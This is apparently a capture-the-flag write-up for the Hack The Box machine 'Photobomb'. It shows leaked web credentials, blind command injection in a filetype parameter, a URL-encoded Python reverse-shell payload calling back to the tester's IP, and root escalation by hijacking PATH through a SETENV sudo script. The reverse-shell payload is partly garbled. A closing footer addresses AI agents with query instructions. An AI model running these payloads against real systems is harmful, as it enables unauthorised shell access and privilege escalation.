# Photobomb

## Enumeration

`sudo nmap -sV <IP>`

* nginx 1.18 with a webserver on port 80 and ssh port 22 are open
* There was interesting info in the source code:

```
<p>To get started, please <a href="/printer" class="creds">click here!</a> (the credentials are in your welcome pack).</p>
<p>If you have any problems with your printer, please call our Technical Support team on 4 4283 77468377.</p>
```

I continued with some dir fuzzing:

```
fuzzing:
	/printer
	/printers
	/printerfriendly
	/printer_friendly
	/printer-friendly	
	/printer_icon
	/printer-icon
	/printerFriendly	
-> All show the same page
```

When giving a non existing page, there is an interesting error:

<figure><img src="https://746814813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fe1HXVppEt3OHWIFqtAXT%2Fuploads%2Fq37Xg6u4K3GI0oYsOBOp%2Fimage.png?alt=media&#x26;token=cf63689e-816f-4f5e-a2cc-cdd1af41cf3c" alt=""><figcaption></figcaption></figure>

There is a JS file containing <http://pH0t0:b0Mb!@photobomb.htb/printer>

You can download files. If you check the request with burp and test around with different injections, there is a different output if ;something is included. So there might me a blind OS command injection.

## Blind OS Command Injection

If you inject at the filetype with this payload: `jpg;ping+-c+4+10.10.16.4` you can see with tcpdump that the command has been executed.

Checking different reverse shell payload, none worked. Only if you use a specific python reverse shell, url encode = and &, and replace spaces with + it works apparently

This was the payload that worked in the end:

```
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpgphoto=voicu-apostol-MWER49YaD-M-
	unsplash.jpg&filetype=jpg;photo=voicu-apostol-MWER49YaD-M-
	unsplash.jpg&filetype=jpg;export+RHOST%3d"10.10.16.4ls"%3bexport+RPORT%3d4444%3bpython3+-c+'import+sys,socket,os,pty%3bs%3dsocket.socket()%3bs.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))%3b[os.dup2(s.fileno(),fd)+for+fd+in+(0,1,2)]%3bpty.spawn("sh")'&dimensions=3000x2000
```

## SUID + SetEnv Script

`sudo -l` reveals, that `/opt/cleanup.sh` is an SUID binary where you also have SETENV permissions.

<figure><img src="https://746814813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fe1HXVppEt3OHWIFqtAXT%2Fuploads%2F71B1uOvDeafsqQqQixnq%2Fimage.png?alt=media&#x26;token=89dba5a0-14dc-407b-a012-0460a1ab9a4e" alt=""><figcaption></figcaption></figure>

With setenv you can change the path for the program. Since find is called with a relative path, you can create a "find" that contains /bin/bash in the homedir of the user “wizard” and then execute the program, making use of the SUID and SETENV permissions:

sudo PATH=/home/wizard:/bin /opt/cleanup.sh


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://shibudocs.gitbook.io/htb-writeups/boxes-easy/photobomb.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.